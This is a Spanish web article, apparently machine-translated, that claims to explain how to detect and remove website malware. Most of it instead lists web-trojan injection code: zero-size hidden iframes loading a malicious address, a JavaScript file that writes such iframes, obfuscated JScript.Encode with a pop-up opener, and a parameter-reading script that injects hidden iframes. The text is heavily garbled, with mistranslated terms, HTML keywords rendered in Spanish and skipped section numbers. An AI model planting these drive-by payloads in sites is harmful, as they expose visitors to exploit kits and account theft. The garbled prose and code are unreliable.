Cómo detectar y eliminar malware de sitios web
La caza es uno de los peligros comunes que tiene un gran impacto tanto en los sitios web como en los clientes. Si está al principio del archivo fuente al que se accede, o hay un código agregado al final, esto generalmente se debe a que el archivo del sitio web ha sido modificado o es ARP si hay muchas ubicaciones de datos (en el medio). archivo fuente, generalmente es la base de datos. Se colgó. Primero debe instalar el software antivirus en el servidor y mantener actualizada la base de datos de virus en línea. Generalmente, si es una web, el efecto es bueno. La página en el servidor está colgada por un caballo, generalmente será detectada.
Según estadísticas incompletas, el 90% de los sitios web han sido pirateados. El hackeo se refiere a la inserción de un fragmento de código malicioso en el archivo de la página web después de obtener parte o la totalidad de los permisos del sitio web o del servidor del sitio web. Los códigos maliciosos son principalmente Estos incluyen códigos de explotación de vulnerabilidades como IE. Cuando un usuario visita una página que ha sido infectada por un troyano, si el sistema no actualiza el parche de vulnerabilidad explotado en el código malicioso, el programa de código malicioso se ejecutará. lo que lleva al robo de cuentas y otros riesgos peligrosos. En la actualidad, la piratería tiene como objetivo principal intereses comerciales. Algunas actividades de piratería tienen como objetivo ganar tráfico, otras sirven para robar cuentas de juegos y otras, y otras son por diversión. Independientemente del propósito, es importante visitar el sitio web pirateado. la imagen de la empresa que explota el sitio web.
Uno: troyano Frame
lt;iframe src=address width=0 height=0gt;lt;/iframegt;
Dos: troyano js file
Primero, agregue el siguiente código
document.write("lt;iframe width='0' height='0' src='address'gt;lt;/iframegt;") ;
Guárdelo como xxx.js,
Entonces el código troyano JS es
lt; script language=javascript src=xxx.jsgt;lt;/ scriptgt;
Tres: cifrado de deformación js
lt; SCRIPT language="JScript.Encode" src=(confunde la dirección de conexión, lo que muestra que esta dirección apunta a la dirección del troyano)" onMouseOver="www_softbar_com( );
return true; "gt; El contenido que se mostrará en la páginalt;
lt; /p>
función www_163_com ()
{
var url="Dirección del caballo de red";
abrir
( url, "NuevaVentana", barra de herramientas=no, ubicación=no, directorios=no, estado=no, barra de menú=no, barras de desplazamiento=no, resizabl
e=no, copyhistory=yes, ancho=800 , height=600, left= 10, top=10");
}
lt;/SCRIPTgt;
Once: Determinar el código del sistema
lt; !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transicional//ES"gt;
lt;HTMLgt;lt;HEADgt;lt;TITLEgt;404lt;/TITLEgt ;
lt;META ancho=100 alto=100 desplazamiento=no frameborder=0gt;")
else
document.write ("lt;iframe src = ancho=100 alto= 100 desplazamiento=no frameborder=0gt;")
end if
lt;/scriptgt;
Trece: Lectura inteligente de js demostración de código
//Leer el objeto de src
var v = document.getElementById("advjs");
//Leer los parámetros de src
var u_num = getUrlParameterAdv("showmatrix_num", v.getAttribute('src'));
document.write("lt;iframe src=\"/1/" u_num " .htm\" ancho=\"0\" alto=\"0\"
frameborder=\"0\"gt;lt;/iframegt;");
document.writeln("lt;!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transicional\/\/EN\"gt;");
documento .writeln("lt;HTMLgt;lt;HEADgt;");
document.writeln("lt;META\/demo.js\')\"gt;");
document.writeln("lt; DIV ");
document.writeln("style=\"CURSOR: url(\'\/demo.js\')\"gt;lt;\ /DIVgt;lt;\/DIVgt;lt;
\/BODYgt;lt;\/HTMLgt;")
//Analizar la función del parámetro de src
función getUrlParameterAdv(asName, lsURL){
loU = lsURL.split("?");
if (loU.lengthgt; 1){
var loallPm = loU[1].split("amp;");
for (var i=0; ilt; loallPm.length; i){
var loPm = loallPm .split("=");
if (loPm[0]==asName){
if (loPm.lengthgt;1){
return loPm[1];
}else{
return "";
}
}
}
}
devuelve nulo;
}